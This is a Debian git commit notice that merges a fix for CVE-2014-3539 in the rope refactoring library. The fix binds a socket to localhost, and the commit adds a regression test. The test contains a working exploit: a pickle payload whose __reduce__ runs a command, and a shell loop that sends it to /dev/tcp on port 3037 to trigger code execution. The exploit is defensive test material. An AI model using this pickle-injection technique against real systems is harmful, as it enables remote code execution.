[Python-modules-commits] [rope] 04/12: merge patched into master
Arnaud Fontaine
arnau at moszumanska.debian.org
Thu Apr 13 08:11:24 UTC 2017
This is an automated email from the git hooks/post-receive script.
arnau pushed a commit to branch master
in repository rope.
commit 6c740f036381a887c3569bc200548fa4ed7da2e6
Merge: 8b73feb 8b29730
Author: Arnaud Fontaine <arnau at debian.org>
Date: Thu Jan 26 13:40:16 2017 +0900
merge patched into master
debian/.git-dpm | 4 +-
debian/patches/CVE-2014-3539 | 215 +++++++++++++++++++++++++++++++
debian/patches/series | 1 +
rope/base/oi/doa.py | 2 +-
ropetest/CVE20143539/CVE-2014-3539.py | 18 +++
ropetest/CVE20143539/README.md | 17 +++
ropetest/CVE20143539/__init__.py | 32 +++++
ropetest/CVE20143539/generate_payload.py | 8 ++
ropetest/CVE20143539/payload.txt | 9 ++
ropetest/CVE20143539/project/hello.py | 1 +
ropetest/CVE20143539/run_reproducer.sh | 11 ++
ropetest/__init__.py | 3 +
12 files changed, 318 insertions(+), 3 deletions(-)
diff --cc debian/.git-dpm
index b0030dd,0000000..dc9f794
mode 100644,000000..100644
--- a/debian/.git-dpm
+++ b/debian/.git-dpm
@@@ -1,11 -1,0 +1,11 @@@
+# see git-dpm(1) from git-dpm package
- 835afd55ba93a1632462d454b5be0985b6ca9794
- 835afd55ba93a1632462d454b5be0985b6ca9794
++8b29730f46571086b880fee6be33f56623c613bc
++8b29730f46571086b880fee6be33f56623c613bc
+835afd55ba93a1632462d454b5be0985b6ca9794
+835afd55ba93a1632462d454b5be0985b6ca9794
+rope_0.10.3.orig.tar.gz
+8c2e85336ef9c95127cabd05b39227094c6db19a
+226123
+debianTag="debian/%e%v"
+patchedTag="patched/%e%v"
+upstreamTag="upstream/%e%u"
diff --cc debian/patches/CVE-2014-3539
index 0000000,0000000..dd2d1b5
new file mode 100644
--- /dev/null
+++ b/debian/patches/CVE-2014-3539
@@@ -1,0 -1,0 +1,215 @@@
++From 8b29730f46571086b880fee6be33f56623c613bc Mon Sep 17 00:00:00 2001
++From: Arnaud Fontaine <arnau at debian.org>
++Date: Thu, 26 Jan 2017 13:38:11 +0900
++Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
++ =?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
++ =?UTF-8?q?/rope):?=
++MIME-Version: 1.0
++Content-Type: text/plain; charset=UTF-8
++Content-Transfer-Encoding: 8bit
++
++ commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
++ Author: Matěj Cepl <mcepl at cepl.eu>
++ Date: Tue Feb 10 12:34:20 2015 +0100
++
++ Just add reporter’s suggested reproducer
++
++ commit a6cb534debe9aff623b6b19ae2dedbf872069a50
++ Author: Matej Cepl <mcepl at cepl.eu>
++ Date: Thu Feb 12 01:12:15 2015 +0100
++
++ limit socket connections to localhost
++
++Patch-Name: CVE-2014-3539
++---
++ rope/base/oi/doa.py | 2 +-
++ ropetest/CVE20143539/CVE-2014-3539.py | 18 ++++++++++++++++++
++ ropetest/CVE20143539/README.md | 17 +++++++++++++++++
++ ropetest/CVE20143539/__init__.py | 32 ++++++++++++++++++++++++++++++++
++ ropetest/CVE20143539/generate_payload.py | 8 ++++++++
++ ropetest/CVE20143539/payload.txt | 9 +++++++++
++ ropetest/CVE20143539/project/hello.py | 1 +
++ ropetest/CVE20143539/run_reproducer.sh | 11 +++++++++++
++ ropetest/__init__.py | 3 +++
++ 9 files changed, 100 insertions(+), 1 deletion(-)
++ create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
++ create mode 100644 ropetest/CVE20143539/README.md
++ create mode 100644 ropetest/CVE20143539/__init__.py
++ create mode 100644 ropetest/CVE20143539/generate_payload.py
++ create mode 100644 ropetest/CVE20143539/payload.txt
++ create mode 100644 ropetest/CVE20143539/project/hello.py
++ create mode 100644 ropetest/CVE20143539/run_reproducer.sh
++
++diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
++index de45902..ed44d25 100644
++--- a/rope/base/oi/doa.py
+++++ b/rope/base/oi/doa.py
++@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
++ self.data_port = 3037
++ while self.data_port < 4000:
++ try:
++- self.server_socket.bind(('', self.data_port))
+++ self.server_socket.bind(('127.0.0.1', self.data_port))
++ break
++ except socket.error:
++ self.data_port += 1
++diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
++new file mode 100644
++index 0000000..5dd37e1
++--- /dev/null
+++++ b/ropetest/CVE20143539/CVE-2014-3539.py
++@@ -0,0 +1,18 @@
+++#!/usr/bin/env python
+++# CVE-2014-3539 reproducer/exploit
+++# Vasyl Kaigorodov <vkaigoro at redhat.com>
+++# Tested on Python 2.7.x
+++
+++import sys
+++from rope.base import project
+++
+++try:
+++ open('payload.txt', 'r')
+++except IOError:
+++ print("payload.txt not found, run:")
+++ print("\tpython generate_payload.py")
+++ sys.exit(1)
+++
+++myproject = project.Project('project/')
+++res = myproject.get_resource("hello.py")
+++myproject.pycore.run_module(res)
++diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
++new file mode 100644
++index 0000000..5c620ef
++--- /dev/null
+++++ b/ropetest/CVE20143539/README.md
++@@ -0,0 +1,17 @@
+++== List of files ==
+++
+++project/ - directory containing an example python module
+++CVE-2014-3539.py - python script which tries to load an example python module
+++ for re-factoring (normal workflow simulation)
+++generate_payload.py - generates payload.txt (evil code to run)
+++payload.txt - example payload (running /bin/uptime)
+++run_reproducer.sh - main file that sticks above together
+++
+++== Usage ==
+++
+++Run ./run_reproducer.sh.
+++If the system is vulnerable, you'll see the output similar to below:
+++
+++ $ ./run_reproducer.sh
+++ SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
+++
++diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
++new file mode 100644
++index 0000000..3ab3be6
++--- /dev/null
+++++ b/ropetest/CVE20143539/__init__.py
++@@ -0,0 +1,32 @@
+++import os.path
+++import subprocess
+++try:
+++ import unittest2 as unittest
+++except ImportError:
+++ import unittest
+++
+++
+++class TestCVE20143539(unittest.TestCase):
+++ def test_case(self):
+++ cur_dir = os.path.dirname(__file__)
+++ script_name = os.path.join(cur_dir, 'run_reproducer.sh')
+++ pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
+++ stderr=subprocess.PIPE, cwd=cur_dir)
+++ pid.communicate()
+++ self.assertEquals(pid.returncode, 0)
+++
+++
+++def suite():
+++ result = unittest.TestSuite()
+++ result.addTests(unittest.makeSuite(TestCVE20143539))
+++ return result
+++
+++
+++if __name__ == '__main__':
+++ import sys
+++ if len(sys.argv) > 1:
+++ unittest.main()
+++ else:
+++ runner = unittest.TextTestRunner()
+++ res = runner.run(suite())
+++ sys.exit(not res.wasSuccessful())
++diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
++new file mode 100644
++index 0000000..c8d3e01
++--- /dev/null
+++++ b/ropetest/CVE20143539/generate_payload.py
++@@ -0,0 +1,8 @@
+++import cPickle
+++import subprocess
+++
+++class RunBinSh(object):
+++ def __reduce__(self):
+++ return (subprocess.Popen, (('/bin/uptime',),))
+++
+++open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
++diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
++new file mode 100644
++index 0000000..434dd0f
++--- /dev/null
+++++ b/ropetest/CVE20143539/payload.txt
++@@ -0,0 +1,9 @@
+++csubprocess
+++Popen
+++p1
+++((S'/bin/uptime'
+++p2
+++tp3
+++tp4
+++Rp5
+++.
++\ No newline at end of file
++diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
++new file mode 100644
++index 0000000..7df869a
++--- /dev/null
+++++ b/ropetest/CVE20143539/project/hello.py
++@@ -0,0 +1 @@
+++print("Hello, World!")
++diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
++new file mode 100644
++index 0000000..b1f7fac
++--- /dev/null
+++++ b/ropetest/CVE20143539/run_reproducer.sh
++@@ -0,0 +1,11 @@
+++#!/bin/bash
+++export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
+++trap "killall -- $(basename $0)" EXIT
+++
+++(while : ; do
+++ ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
+++ && echo -n "SUCCESS: "
+++done)&
+++
+++python CVE-2014-3539.py 2>/dev/null
+++exit $?
++diff --git a/ropetest/__init__.py b/ropetest/__init__.py
++index f1cb459..744beee 100644
++--- a/ropetest/__init__.py
+++++ b/ropetest/__init__.py
++@@ -16,6 +16,8 @@ import ropetest.simplifytest
++ import ropetest.contrib
++ import ropetest.refactor
++
+++import ropetest.CVE20143539
+++
++
++ def suite():
++ result = unittest.TestSuite()
++@@ -33,6 +35,7 @@ def suite():
++
++ result.addTests(ropetest.refactor.suite())
++ result.addTests(ropetest.contrib.suite())
+++ result.addTests(ropetest.CVE20143539.suite())
++
++ return result
++
diff --cc debian/patches/series
index 0000000,0000000..4a47c0b
new file mode 100644
--- /dev/null
+++ b/debian/patches/series
@@@ -1,0 -1,0 +1,1 @@@
++CVE-2014-3539
--
Alioth's /usr/local/bin/git-commit-notice on /srv/git.debian.org/git/python-modules/packages/rope.git
More information about the Python-modules-commits
mailing list